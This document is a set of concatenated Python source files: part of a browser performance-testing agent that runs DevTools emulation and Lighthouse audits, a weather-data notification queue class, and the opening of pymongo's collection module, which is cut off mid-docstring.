'mobile' in self.job and self.job['mobile'] and \
'width' in self.job and 'height' in self.job and \
'dpr' in self.job:
width = int(re.search(r'\d+', str(self.job['width'])).group())
height = int(re.search(r'\d+', str(self.job['height'])).group())
self.devtools.send_command("Emulation.setDeviceMetricsOverride",
{"width": width,
"height": height,
"screenWidth": width,
"screenHeight": height,
"scale": 1,
"positionX": 0,
"positionY": 0,
"deviceScaleFactor": float(self.job['dpr']),
"mobile": True,
"screenOrientation":
{"angle": 0, "type": "portraitPrimary"}},
wait=True)
self.devtools.send_command("Emulation.setTouchEmulationEnabled",
{"enabled": True,
"configuration": "mobile"},
wait=True)
self.devtools.send_command("Emulation.setScrollbarsHidden",
{"hidden": True},
wait=True)
if (task['running_lighthouse'] or not self.options.throttle) and 'throttle_cpu' in self.job:
logging.debug('CPU Throttle target: %0.3fx', self.job['throttle_cpu'])
if self.job['throttle_cpu'] > 1:
self.devtools.send_command("Emulation.setCPUThrottlingRate",
{"rate": self.job['throttle_cpu']},
wait=True)
# Location
if 'lat' in self.job and 'lng' in self.job:
try:
lat = float(str(self.job['lat']))
lng = float(str(self.job['lng']))
self.devtools.send_command(
'Emulation.setGeolocationOverride',
{'latitude': lat, 'longitude': lng,
'accuracy': 0})
except Exception:
logging.exception('Error overriding location')
# UA String
ua_string = self.devtools.execute_js("navigator.userAgent")
if ua_string is not None:
match = re.search(r'Chrome\/(\d+\.\d+\.\d+\.\d+)', ua_string)
if match:
self.browser_version = match.group(1)
if 'uastring' in self.job:
ua_string = self.job['uastring']
if ua_string is not None and 'AppendUA' in task:
ua_string += ' ' + task['AppendUA']
if ua_string is not None:
self.job['user_agent_string'] = ua_string
# Disable js
if self.job['noscript']:
self.devtools.send_command("Emulation.setScriptExecutionDisabled",
{"value": True}, wait=True)
self.devtools.prepare_browser()
def on_start_recording(self, task):
"""Start recording"""
task['page_data'] = {'date': time.time()}
task['page_result'] = None
task['run_start_time'] = monotonic()
if self.browser_version is not None and 'browserVersion' not in task['page_data']:
task['page_data']['browserVersion'] = self.browser_version
task['page_data']['browser_version'] = self.browser_version
if not self.options.throttle and 'throttle_cpu' in self.job:
task['page_data']['throttle_cpu_requested'] = self.job['throttle_cpu_requested']
if self.job['throttle_cpu'] > 1:
task['page_data']['throttle_cpu'] = self.job['throttle_cpu']
if self.devtools is not None:
self.devtools.start_recording()
def on_stop_capture(self, task):
"""Do any quick work to stop things that are capturing data"""
if self.devtools is not None:
self.devtools.stop_capture()
def on_stop_recording(self, task):
"""Stop recording"""
if self.devtools is not None:
self.devtools.collect_trace()
if self.devtools_screenshot:
if self.job['pngScreenShot']:
screen_shot = os.path.join(task['dir'],
task['prefix'] + '_screen.png')
self.devtools.grab_screenshot(screen_shot, png=True)
else:
screen_shot = os.path.join(task['dir'],
task['prefix'] + '_screen.jpg')
self.devtools.grab_screenshot(screen_shot, png=False, resize=600)
# Collect end of test data from the browser
self.collect_browser_metrics(task)
# Stop recording dev tools (which also collects the trace)
self.devtools.stop_recording()
def run_task(self, task):
"""Run an individual test"""
if self.devtools is not None:
self.task = task
logging.debug("Running test")
end_time = monotonic() + task['test_time_limit']
task['current_step'] = 1
recording = False
while len(task['script']) and task['error'] is None and \
monotonic() < end_time:
self.prepare_task(task)
command = task['script'].pop(0)
if not recording and command['record']:
recording = True
self.on_start_recording(task)
self.process_command(command)
if command['record']:
self.devtools.wait_for_page_load()
if not task['combine_steps'] or not len(task['script']):
self.on_stop_capture(task)
self.on_stop_recording(task)
recording = False
self.on_start_processing(task)
self.wait_for_processing(task)
self.process_devtools_requests(task)
self.step_complete(task) #pylint: disable=no-member
if task['log_data']:
# Move on to the next step
task['current_step'] += 1
self.event_name = None
task['navigated'] = True
self.task = None
def on_start_processing(self, task):
"""Start any processing of the captured data"""
if task['log_data']:
# Start the processing that can run in a background thread
optimization = OptimizationChecks(self.job, task, self.get_requests())
optimization.start()
# Run the video post-processing
if self.use_devtools_video and self.job['video']:
self.process_video()
self.wappalyzer_detect(task, self.devtools.main_request_headers)
# wait for the background optimization checks
optimization.join()
def wait_for_processing(self, task):
"""Wait for the background processing (if any)"""
pass
def execute_js(self, script):
"""Run javascipt"""
ret = None
if self.devtools is not None:
ret = self.devtools.execute_js(script)
return ret
def prepare_task(self, task):
"""Format the file prefixes for multi-step testing"""
if task['current_step'] == 1:
task['prefix'] = task['task_prefix']
task['video_subdirectory'] = task['task_video_prefix']
else:
task['prefix'] = '{0}_{1:d}'.format(task['task_prefix'], task['current_step'])
task['video_subdirectory'] = '{0}_{1:d}'.format(task['task_video_prefix'],
task['current_step'])
if task['video_subdirectory'] not in task['video_directories']:
task['video_directories'].append(task['video_subdirectory'])
if self.event_name is not None:
task['step_name'] = self.event_name
else:
task['step_name'] = 'Step_{0:d}'.format(task['current_step'])
def process_video(self):
"""Post process the video"""
from internal.video_processing import VideoProcessing
video = VideoProcessing(self.options, self.job, self.task)
video.process()
def process_devtools_requests(self, task):
"""Process the devtools log and pull out the requests information"""
path_base = os.path.join(self.task['dir'], self.task['prefix'])
devtools_file = path_base + '_devtools.json.gz'
if os.path.isfile(devtools_file):
from internal.support.devtools_parser import DevToolsParser
out_file = path_base + '_devtools_requests.json.gz'
options = {'devtools': devtools_file, 'cached': task['cached'], 'out': out_file}
netlog = path_base + '_netlog_requests.json.gz'
options['netlog'] = netlog if os.path.isfile(netlog) else None
optimization = path_base + '_optimization.json.gz'
options['optimization'] = optimization if os.path.isfile(optimization) else None
user_timing = path_base + '_user_timing.json.gz'
options['user'] = user_timing if os.path.isfile(user_timing) else None
coverage = path_base + '_coverage.json.gz'
options['coverage'] = coverage if os.path.isfile(coverage) else None
cpu = path_base + '_timeline_cpu.json.gz'
options['cpu'] = cpu if os.path.isfile(cpu) else None
v8stats = path_base + '_v8stats.json.gz'
options['v8stats'] = v8stats if os.path.isfile(v8stats) else None
parser = DevToolsParser(options)
parser.process()
# Cleanup intermediate files that are not needed
if 'debug' not in self.job or not self.job['debug']:
if os.path.isfile(netlog):
os.remove(netlog)
if os.path.isfile(optimization):
os.remove(optimization)
if os.path.isfile(coverage):
os.remove(coverage)
if os.path.isfile(devtools_file):
os.remove(devtools_file)
if 'page_data' in parser.result and 'result' in parser.result['page_data']:
self.task['page_result'] = parser.result['page_data']['result']
def run_js_file(self, file_name):
"""Execute one of our js scripts"""
ret = None
script = None
script_file_path = os.path.join(self.script_dir, file_name)
if os.path.isfile(script_file_path):
with io.open(script_file_path, 'r', encoding='utf-8') as script_file:
script = script_file.read()
if script is not None:
ret = self.devtools.execute_js(script)
return ret
def collect_browser_metrics(self, task):
"""Collect all of the in-page browser metrics that we need"""
user_timing = self.run_js_file('user_timing.js')
if user_timing is not None:
path = os.path.join(task['dir'], task['prefix'] + '_timed_events.json.gz')
with gzip.open(path, GZIP_TEXT, 7) as outfile:
outfile.write(json.dumps(user_timing))
page_data = self.run_js_file('page_data.js')
if page_data is not None:
task['page_data'].update(page_data)
if 'customMetrics' in self.job:
custom_metrics = {}
for name in self.job['customMetrics']:
script = 'var wptCustomMetric = function() {' +\
self.job['customMetrics'][name] +\
'};try{wptCustomMetric();}catch(e){};'
custom_metrics[name] = self.devtools.execute_js(script)
path = os.path.join(task['dir'], task['prefix'] + '_metrics.json.gz')
with gzip.open(path, GZIP_TEXT, 7) as outfile:
outfile.write(json.dumps(custom_metrics))
if 'heroElementTimes' in self.job and self.job['heroElementTimes']:
hero_elements = None
custom_hero_selectors = {}
if 'heroElements' in self.job:
custom_hero_selectors = self.job['heroElements']
with io.open(os.path.join(self.script_dir, 'hero_elements.js'), 'r', encoding='utf-8') as script_file:
hero_elements_script = script_file.read()
script = hero_elements_script + '(' + json.dumps(custom_hero_selectors) + ')'
hero_elements = self.devtools.execute_js(script)
if hero_elements is not None:
logging.debug('Hero Elements: %s', json.dumps(hero_elements))
path = os.path.join(task['dir'], task['prefix'] + '_hero_elements.json.gz')
with gzip.open(path, GZIP_TEXT, 7) as outfile:
outfile.write(json.dumps(hero_elements))
def process_command(self, command):
"""Process an individual script command"""
logging.debug("Processing script command:")
logging.debug(command)
if command['command'] == 'navigate':
self.task['page_data']['URL'] = command['target']
url = str(command['target']).replace('"', '\"')
script = 'window.location="{0}";'.format(url)
script = self.prepare_script_for_record(script) #pylint: disable=no-member
self.devtools.start_navigating()
self.devtools.execute_js(script)
elif command['command'] == 'logdata':
self.task['combine_steps'] = False
if int(re.search(r'\d+', str(command['target'])).group()):
logging.debug("Data logging enabled")
self.task['log_data'] = True
else:
logging.debug("Data logging disabled")
self.task['log_data'] = False
elif command['command'] == 'combinesteps':
self.task['log_data'] = True
self.task['combine_steps'] = True
elif command['command'] == 'seteventname':
self.event_name = command['target']
elif command['command'] == 'exec':
script = command['target']
if command['record']:
script = self.prepare_script_for_record(script) #pylint: disable=no-member
self.devtools.start_navigating()
self.devtools.execute_js(script)
elif command['command'] == 'sleep':
delay = min(60, max(0, int(re.search(r'\d+', str(command['target'])).group())))
if delay > 0:
time.sleep(delay)
elif command['command'] == 'setabm':
self.task['stop_at_onload'] = bool('target' in command and
int(re.search(r'\d+',
str(command['target'])).group()) == 0)
elif command['command'] == 'setactivitytimeout':
if 'target' in command:
milliseconds = int(re.search(r'\d+', str(command['target'])).group())
self.task['activity_time'] = max(0, min(30, float(milliseconds) / 1000.0))
elif command['command'] == 'setuseragent':
self.task['user_agent_string'] = command['target']
elif command['command'] == 'setcookie':
if 'target' in command and 'value' in command:
url = command['target'].strip()
cookie = command['value']
pos = cookie.find(';')
if pos > 0:
cookie = cookie[:pos]
pos = cookie.find('=')
if pos > 0:
name = cookie[:pos].strip()
value = cookie[pos + 1:].strip()
if len(name) and len(value) and len(url):
self.devtools.send_command('Network.setCookie',
{'url': url, 'name': name, 'value': value})
elif command['command'] == 'setlocation':
try:
if 'target' in command and command['target'].find(',') > 0:
accuracy = 0
if 'value' in command and re.match(r'\d+', command['value']):
accuracy = int(re.search(r'\d+', str(command['value'])).group())
parts = command['target'].split(',')
lat = float(parts[0])
lng = float(parts[1])
self.devtools.send_command(
'Emulation.setGeolocationOverride',
{'latitude': lat, 'longitude': lng,
'accuracy': accuracy})
except Exception:
logging.exception('Error setting location')
elif command['command'] == 'addheader':
self.devtools.set_header(command['target'])
elif command['command'] == 'setheader':
self.devtools.set_header(command['target'])
elif command['command'] == 'resetheaders':
self.devtools.reset_headers()
elif command['command'] == 'clearcache':
self.devtools.clear_cache()
elif command['command'] == 'disablecache':
disable_cache = bool('target' in command and \
int(re.search(r'\d+',
str(command['target'])).group()) == 1)
self.devtools.disable_cache(disable_cache)
def navigate(self, url):
"""Navigate to the given URL"""
if self.devtools is not None:
self.devtools.send_command('Page.navigate', {'url': url}, wait=True)
def get_requests(self):
"""Get the request details for running an optimization check"""
requests = None
if self.devtools is not None:
requests = self.devtools.get_requests()
return requests
def lighthouse_thread(self):
"""Run lighthouse in a thread so we can kill it if it times out"""
cmd = self.lighthouse_command
self.task['lighthouse_log'] = cmd + "\n"
logging.debug(cmd)
proc = subprocess.Popen(cmd, shell=True, stderr=subprocess.PIPE)
for line in iter(proc.stderr.readline, b''):
try:
line = unicode(line,errors='ignore')
logging.debug(line.rstrip())
self.task['lighthouse_log'] += line
except Exception:
logging.exception('Error recording lighthouse log line %s', line.rstrip())
proc.communicate()
def run_lighthouse_test(self, task):
"""Run a lighthouse test against the current browser session"""
task['lighthouse_log'] = ''
if 'url' in self.job and self.job['url'] is not None:
self.job['shaper'].configure(self.job, task)
output_path = os.path.join(task['dir'], 'lighthouse.json')
json_file = os.path.join(task['dir'], 'lighthouse.report.json')
json_gzip = os.path.join(task['dir'], 'lighthouse.json.gz')
html_file = os.path.join(task['dir'], 'lighthouse.report.html')
html_gzip = os.path.join(task['dir'], 'lighthouse.html.gz')
time_limit = min(int(task['time_limit']), 80)
command = ['lighthouse',
'"{0}"'.format(self.job['url']),
'--channel', 'wpt',
'--disable-network-throttling',
'--disable-cpu-throttling',
'--throttling-method', 'provided',
'--enable-error-reporting',
'--max-wait-for-load', str(int(time_limit * 1000)),
'--port', str(task['port']),
'--output', 'html',
'--output', 'json',
'--output-path', '"{0}"'.format(output_path)]
if self.job['keep_lighthouse_trace']:
command.append('--save-assets')
if not self.job['keep_lighthouse_screenshots']:
command.extend(['--skip-audits', 'screenshot-thumbnails'])
if self.options.android or 'mobile' not in self.job or not self.job['mobile']:
command.extend(['--emulated-form-factor', 'none'])
if 'user_agent_string' in self.job:
sanitized_user_agent = re.sub(r'[^a-zA-Z0-9_\-.;:/()\[\] ]+', '', self.job['user_agent_string'])
command.append('--chrome-flags="--user-agent=\'{0}\'"'.format(sanitized_user_agent))
if len(task['block']):
for pattern in task['block']:
pattern = "'" + pattern.replace("'", "'\\''") + "'"
command.extend(['--blocked-url-patterns', pattern])
if 'headers' in task:
try:
headers_file = os.path.join(task['dir'], 'lighthouse-headers.json')
with open(headers_file, 'wt') as f_out:
json.dump(task['headers'], f_out)
command.extend(['--extra-headers', '"{0}"'.format(headers_file)])
except Exception:
logging.exception('Error adding custom headers for lighthouse test')
cmd = ' '.join(command)
self.lighthouse_command = cmd
# Give lighthouse up to 10 minutes to run all of the audits
try:
lh_thread = threading.Thread(target=self.lighthouse_thread)
lh_thread.start()
lh_thread.join(600)
except Exception:
logging.exception('Error running lighthouse audits')
from .os_util import kill_all
kill_all('node', True)
self.job['shaper'].reset()
# Rename and compress the trace file, delete the other assets
if self.job['keep_lighthouse_trace']:
try:
lh_trace_src = os.path.join(task['dir'], 'lighthouse-0.trace.json')
if os.path.isfile(lh_trace_src):
# read the JSON in and re-write it line by line to match the other traces
with io.open(lh_trace_src, 'r', encoding='utf-8') as f_in:
trace = json.load(f_in)
if trace is not None and 'traceEvents' in trace:
lighthouse_trace = os.path.join(task['dir'],
'lighthouse_trace.json.gz')
with gzip.open(lighthouse_trace, GZIP_TEXT, 7) as f_out:
f_out.write('{"traceEvents":[{}')
for trace_event in trace['traceEvents']:
f_out.write(",\n")
f_out.write(json.dumps(trace_event))
f_out.write("\n]}")
except Exception:
logging.exception('Error processing lighthouse trace')
# Delete all the left-over lighthouse assets
files = glob.glob(os.path.join(task['dir'], 'lighthouse-*'))
for file_path in files:
try:
os.remove(file_path)
except Exception:
pass
if os.path.isfile(json_file):
lh_report = None
with io.open(json_file, 'r', encoding='utf-8') as f_in:
lh_report = json.load(f_in)
with open(json_file, 'rb') as f_in:
with gzip.open(json_gzip, 'wb', 7) as f_out:
shutil.copyfileobj(f_in, f_out)
try:
os.remove(json_file)
except Exception:
pass
# Extract the audit scores
if lh_report is not None:
audits = {}
# v1.x
if 'aggregations' in lh_report:
for entry in lh_report['aggregations']:
if 'name' in entry and 'total' in entry and \
'scored' in entry and entry['scored']:
name = entry['name'].replace(' ', '')
audits[name] = entry['total']
# v2.x
elif 'reportCategories' in lh_report:
for category in lh_report['reportCategories']:
if 'name' in category and 'score' in category:
category_name = category['name'].replace(' ', '')
score = float(category['score']) / 100.0
audits[category_name] = score
if category['name'] == 'Performance' and 'audits' in category:
for audit in category['audits']:
if 'id' in audit and 'group' in audit and \
audit['group'] == 'perf-metric' and \
'result' in audit and \
'rawValue' in audit['result']:
name = category_name + '.' + \
audit['id'].replace(' ', '')
audits[name] = audit['result']['rawValue']
# v3.x
elif 'categories' in lh_report:
for categoryId in lh_report['categories']:
category = lh_report['categories'][categoryId]
if 'title' not in category or 'score' not in category:
continue
category_title = category['title'].replace(' ', '')
audits[category_title] = category['score']
if categoryId != 'performance' or 'auditRefs' not in category:
continue
for auditRef in category['auditRefs']:
if auditRef['id'] not in lh_report['audits']:
continue
if 'group' not in auditRef or auditRef['group'] != 'metrics':
continue
audit = lh_report['audits'][auditRef['id']]
name = category_title + '.' + audit['id']
if 'rawValue' in audit:
audits[name] = audit['rawValue']
elif 'numericValue' in audit:
audits[name] = audit['numericValue']
audits_gzip = os.path.join(task['dir'], 'lighthouse_audits.json.gz')
with gzip.open(audits_gzip, GZIP_TEXT, 7) as f_out:
json.dump(audits, f_out)
# Compress the HTML lighthouse report
if os.path.isfile(html_file):
try:
with open(html_file, 'rb') as f_in:
with gzip.open(html_gzip, 'wb', 7) as f_out:
shutil.copyfileobj(f_in, f_out)
os.remove(html_file)
except Exception:
logging.exception('Error compressing lighthouse report')
def wappalyzer_detect(self, task, request_headers):
"""Run the wappalyzer detection"""
# Run the Wappalyzer detection (give it 30 seconds at most)
completed = False
if self.devtools is not None:
try:
logging.debug('wappalyzer_detect')
detect_script = self.wappalyzer_script(request_headers)
response = self.devtools.send_command("Runtime.evaluate",
{'expression': detect_script,
'awaitPromise': True,
'returnByValue': True,
'timeout': 30000},
wait=True, timeout=30)
if response is not None and 'result' in response and\
'result' in response['result'] and\
'value' in response['result']['result']:
result = response['result']['result']['value']
if result:
completed = True
logging.debug(result)
detected = json.loads(result)
if 'categories' in detected:
task['page_data']['detected'] = dict(detected['categories'])
if 'apps' in detected:
task['page_data']['detected_apps'] = dict(detected['apps'])
except Exception as err:
logging.exception("Exception running Wappalyzer: %s", err.__str__())
if not completed:
task['page_data']['wappalyzer_failed'] = 1
def wappalyzer_script(self, response_headers):
"""Build the wappalyzer script to run in-browser"""
script = None
try:
with open(os.path.join(self.support_path, 'Wappalyzer', 'script.js')) as f_in:
script = f_in.read()
if script is not None:
wappalyzer = None
with open(os.path.join(self.support_path, 'Wappalyzer', 'wappalyzer.js')) as f_in:
wappalyzer = f_in.read()
if wappalyzer is not None:
json_data = None
with open(os.path.join(self.support_path, 'Wappalyzer', 'apps.json')) as f_in:
json_data = f_in.read()
if json is not None:
# Format the headers as a dictionary of lists
headers = {}
if response_headers is not None:
if isinstance(response_headers, dict):
for key in response_headers:
values = []
entry = response_headers[key]
if isinstance(entry, list):
values = entry
elif isinstance(entry, (str, unicode)):
entries = entry.split('\n')
for value in entries:
values.append(value.strip())
if values:
headers[key.lower()] = values
elif isinstance(response_headers, list):
for pair in response_headers:
if isinstance(pair, (str, unicode)):
parts = pair.split(':', 1)
key = parts[0].strip(' :\n\t').lower()
value = parts[1].strip(' :\n\t')
if key not in headers:
headers[key] = []
headers[key].append(value)
script = script.replace('%WAPPALYZER%', wappalyzer)
script = script.replace('%JSON%', json_data)
script = script.replace('%RESPONSE_HEADERS%', json.dumps(headers))
except Exception:
logging.exception('Error building wappalyzer script')
return script
|
DataQueue.py
|
#
# Convenience class for using the DAF's notifications feature. This is a
# collection that, once connected to EDEX by calling start(), fills with
# data as notifications come in. Runs on a separate thread to allow
# non-blocking data retrieval.
#
#
#
# SOFTWARE HISTORY
#
# Date Ticket# Engineer Description
# ------------ ---------- ----------- --------------------------
# 07/29/16 2416 tgurney Initial creation
#
from awips.dataaccess import DataNotificationLayer as DNL
import time
from threading import Thread
import sys
if sys.version_info.major == 2:
from Queue import Queue, Empty
else: # Python 3 module renamed to 'queue'
from queue import Queue, Empty
# Used to indicate a DataQueue that will produce geometry data.
GEOMETRY = object()
# Used to indicate a DataQueue that will produce grid data.
GRID = object()
# Default maximum queue size.
_DEFAULT_MAXSIZE = 100
class Closed(Exception):
"""Raised when attempting to get data from a closed queue."""
pass
class DataQueue(object):
"""
Convenience class for using the DAF's notifications feature. This is a
collection that, once connected to EDEX by calling start(), fills with
data as notifications come in.
Example for getting obs data:
from DataQueue import DataQueue, GEOMETRY
request = DataAccessLayer.newDataRequest('obs')
request.setParameters('temperature')
request.setLocationNames('KOMA')
q = DataQueue(GEOMETRY, request)
q.start()
for item in q:
print(item.getNumber('temperature'))
"""
def __init__(self, dtype, request, maxsize=_DEFAULT_MAXSIZE):
"""
Create a new DataQueue.
Args:
dtype: Either GRID or GEOMETRY; must match the type of data
requested.
request: IDataRequest describing the data you want. It must at
least have datatype set. All data produced will satisfy the
constraints you specify.
maxsize: Maximum number of data objects the queue can hold at
one time. If the limit is reached, any data coming in after
that will not appear until one or more items are removed using
DataQueue.get().
"""
assert maxsize > 0
assert dtype in (GEOMETRY, GRID)
self._maxsize = maxsize
self._queue = Queue(maxsize=maxsize)
self._thread = None
if dtype is GEOMETRY:
self._notifier = DNL.getGeometryDataUpdates(request)
elif dtype is GRID:
self._notifier = DNL.getGridDataUpdates(request)
def start(self):
"""Start listening for notifications and requesting data."""
if self._thread is not None:
# Already started
return
kwargs = {'callback': self._data_received}
self._thread = Thread(target=self._notifier.subscribe, kwargs=kwargs)
self._thread.daemon = True
self._thread.start()
timer = 0
while not self._notifier.subscribed:
time.sleep(0.1)
timer += 1
if timer >= 100: # ten seconds
raise RuntimeError('timed out when attempting to subscribe')
def _data_received(self, data):
for d in data:
if not isinstance(d, list):
d = [d]
for item in d:
self._queue.put(item)
def get(self, block=True, timeout=None):
"""
Get and return the next available data object. By default, if there is
no data yet available, this method will not return until data becomes
available.
Args:
block: Specifies behavior when the queue is empty. If True, wait
until an item is available before returning (the default). If
False, return None immediately if the queue is empty.
timeout: If block is True, wait this many seconds, and return None
if data is not received in that time.
Returns:
IData
"""
if self.closed:
raise Closed
try:
return self._queue.get(block, timeout)
except Empty:
return None
def get_all(self):
"""
Get all data waiting for processing, in a single list. Always returns
immediately. Returns an empty list if no data has arrived yet.
Returns:
List of IData
"""
data = []
for _ in range(self._maxsize):
next_item = self.get(False)
if next_item is None:
break
data.append(next_item)
return data
def close(self):
"""Close the queue. May not be re-opened after closing."""
if not self.closed:
self._notifier.close()
self._thread.join()
def qsize(self):
"""Return number of items in the queue."""
return self._queue.qsize()
def empty(self):
"""Return True if the queue is empty."""
return self._queue.empty()
def full(self):
"""Return True if the queue is full."""
return self._queue.full()
@property
def closed(self):
"""True if the queue has been closed."""
return not self._notifier.subscribed
@property
def maxsize(self):
"""
Maximum number of data objects the queue can hold at one time.
If this limit is reached, any data coming in after that will not appear
until one or more items are removed using get().
"""
return self._maxsize
def __iter__(self):
if self._thread is not None:
while not self.closed:
yield self.get()
def __enter__(self):
self.start()
return self
def __exit__(self, *unused):
self.close()
|
collection.py
|
# Copyright 2009-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Collection level utilities for Mongo."""
import datetime
import warnings
from bson.code import Code
from bson.objectid import ObjectId
from bson.py3compat import (_unicode,
abc,
integer_types,
string_type)
from bson.raw_bson import RawBSONDocument
from bson.codec_options import CodecOptions
from bson.son import SON
from pymongo import (common,
helpers,
message)
from pymongo.bulk import BulkOperationBuilder, _Bulk
from pymongo.command_cursor import CommandCursor, RawBatchCommandCursor
from pymongo.common import ORDERED_TYPES
from pymongo.collation import validate_collation_or_none
from pymongo.change_stream import CollectionChangeStream
from pymongo.cursor import Cursor, RawBatchCursor
from pymongo.errors import (BulkWriteError,
ConfigurationError,
InvalidName,
OperationFailure)
from pymongo.helpers import (_check_write_command_response,
_raise_last_error)
from pymongo.message import _UNICODE_REPLACE_CODEC_OPTIONS
from pymongo.operations import IndexModel
from pymongo.read_preferences import ReadPreference
from pymongo.results import (BulkWriteResult,
DeleteResult,
InsertOneResult,
InsertManyResult,
UpdateResult)
from pymongo.write_concern import WriteConcern
_NO_OBJ_ERROR = "No matching object found"
_UJOIN = u"%s.%s"
class ReturnDocument(object):
"""An enum used with
:meth:`~pymongo.collection.Collection.find_one_and_replace` and
:meth:`~pymongo.collection.Collection.find_one_and_update`.
"""
BEFORE = False
"""Return the original document before it was updated/replaced, or
``None`` if no document matches the query.
"""
AFTER = True
"""Return the updated/replaced or inserted document."""
class Collection(common.BaseObject):
"""A Mongo collection.
"""
def __init__(self, database, name, create=False, codec_options=None,
read_preference=None, write_concern=None, read_concern=None,
session=None, **kwargs):
"""Get / create a Mongo collection.
Raises :class:`TypeError` if `name` is not an instance of
:class:`basestring` (:class:`str` in python 3). Raises
:class:`~pymongo.errors.InvalidName` if `name` is not a valid
collection name. Any additional keyword arguments will be used
as options passed to the create command. See
:meth:`~pymongo.database.Database.create_collection` for valid
options.
If `create` is ``True``, `collation` is specified, or any additional
keyword arguments are present, a ``create`` command will be
sent, using ``session`` if specified. Otherwise, a ``create`` command
will not be sent and the collection will be created implicitly on first
use. The optional ``session`` argument is *only* used for the ``create``
command, it is not associated with the collection afterward.
:Parameters:
- `database`: the database to get a collection from
- `name`: the name of the collection to get
- `create` (optional): if ``True``, force collection
creation even without options being set
- `codec_options` (optional): An instance of
:class:`~bson.codec_options.CodecOptions`. If ``None`` (the
default) database.codec_options is used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) database.read_preference is used.
- `write_concern` (optional): An instance of
:class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the
default) database.write_concern is used.
- `read_concern` (optional): An instance of
:class:`~pymongo.read_concern.ReadConcern`. If ``None`` (the
default) database.read_concern is used.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. If a collation is provided,
it will be passed to the create collection command. This option is
only supported on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession` that is used with
the create collection command
- `**kwargs` (optional): additional keyword arguments will
be passed as options for the create collection command
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Support the `collation` option.
.. versionchanged:: 3.2
Added the read_concern option.
.. versionchanged:: 3.0
Added the codec_options, read_preference, and write_concern options.
Removed the uuid_subtype attribute.
:class:`~pymongo.collection.Collection` no longer returns an
instance of :class:`~pymongo.collection.Collection` for attribute
names with leading underscores. You must use dict-style lookups
instead::
collection['__my_collection__']
Not:
collection.__my_collection__
.. versionchanged:: 2.2
Removed deprecated argument: options
.. versionadded:: 2.1
uuid_subtype attribute
.. mongodoc:: collections
"""
super(Collection, self).__init__(
codec_options or database.codec_options,
read_preference or database.read_preference,
write_concern or database.write_concern,
read_concern or database.read_concern)
if not isinstance(name, string_type):
raise TypeError("name must be an instance "
"of %s" % (string_type.__name__,))
if not name or ".." in name:
raise InvalidName("collection names cannot be empty")
if "$" in name and not (name.startswith("oplog.$main") or
name.startswith("$cmd")):
raise InvalidName("collection names must not "
"contain '$': %r" % name)
if name[0] == "." or name[-1] == ".":
raise InvalidName("collection names must not start "
"or end with '.': %r" % name)
if "\x00" in name:
raise InvalidName("collection names must not contain the "
"null character")
collation = validate_collation_or_none(kwargs.pop('collation', None))
self.__database = database
self.__name = _unicode(name)
self.__full_name = _UJOIN % (self.__database.name, self.__name)
if create or kwargs or collation:
self.__create(kwargs, collation, session)
self.__write_response_codec_options = self.codec_options._replace(
unicode_decode_error_handler='replace',
document_class=dict)
def _socket_for_reads(self, session):
return self.__database.client._socket_for_reads(
self._read_preference_for(session))
def _socket_for_primary_reads(self, session):
read_pref = ((session and session._txn_read_preference())
or ReadPreference.PRIMARY)
return self.__database.client._socket_for_reads(read_pref), read_pref
def _socket_for_writes(self):
return self.__database.client._socket_for_writes()
def _command(self, sock_info, command, slave_ok=False,
read_preference=None,
codec_options=None, check=True, allowable_errors=None,
read_concern=None,
write_concern=None,
collation=None,
session=None,
retryable_write=False):
"""Internal command helper.
:Parameters:
- `sock_info` - A SocketInfo instance.
- `command` - The command itself, as a SON instance.
- `slave_ok`: whether to set the SlaveOkay wire protocol bit.
- `codec_options` (optional) - An instance of
:class:`~bson.codec_options.CodecOptions`.
- `check`: raise OperationFailure if there are errors
- `allowable_errors`: errors to ignore if `check` is True
- `read_concern` (optional) - An instance of
:class:`~pymongo.read_concern.ReadConcern`.
- `write_concern`: An instance of
:class:`~pymongo.write_concern.WriteConcern`. This option is only
valid for MongoDB 3.4 and above.
- `collation` (optional) - An instance of
:class:`~pymongo.collation.Collation`.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
The result document.
"""
with self.__database.client._tmp_session(session) as s:
return sock_info.command(
self.__database.name,
command,
slave_ok,
read_preference or self._read_preference_for(session),
codec_options or self.codec_options,
check,
allowable_errors,
read_concern=read_concern,
write_concern=write_concern,
parse_write_concern_error=True,
collation=collation,
session=s,
client=self.__database.client,
retryable_write=retryable_write)
def __create(self, options, collation, session):
"""Sends a create command with the given options.
"""
cmd = SON([("create", self.__name)])
if options:
if "size" in options:
options["size"] = float(options["size"])
cmd.update(options)
with self._socket_for_writes() as sock_info:
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
write_concern=self._write_concern_for(session),
collation=collation, session=session)
def __getattr__(self, name):
"""Get a sub-collection of this collection by name.
Raises InvalidName if an invalid collection name is used.
:Parameters:
- `name`: the name of the collection to get
"""
if name.startswith('_'):
full_name = _UJOIN % (self.__name, name)
raise AttributeError(
"Collection has no attribute %r. To access the %s"
" collection, use database['%s']." % (
name, full_name, full_name))
return self.__getitem__(name)
def __getitem__(self, name):
return Collection(self.__database,
_UJOIN % (self.__name, name),
False,
self.codec_options,
self.read_preference,
self.write_concern,
self.read_concern)
def __repr__(self):
return "Collection(%r, %r)" % (self.__database, self.__name)
def __eq__(self, other):
if isinstance(other, Collection):
return (self.__database == other.database and
self.__name == other.name)
return NotImplemented
def __ne__(self, other):
return not self == other
@property
def full_name(self):
"""The full name of this :class:`Collection`.
The full name is of the form `database_name.collection_name`.
"""
return self.__full_name
@property
def name(self):
"""The name of this :class:`Collection`."""
return self.__name
@property
def database(self):
"""The :class:`~pymongo.database.Database` that this
:class:`Collection` is a part of.
"""
return self.__database
def with_options(
self, codec_options=None, read_preference=None,
write_concern=None, read_concern=None):
"""Get a clone of this collection changing the specified settings.
>>> coll1.read_preference
Primary()
>>> from pymongo import ReadPreference
>>> coll2 = coll1.with_options(read_preference=ReadPreference.SECONDARY)
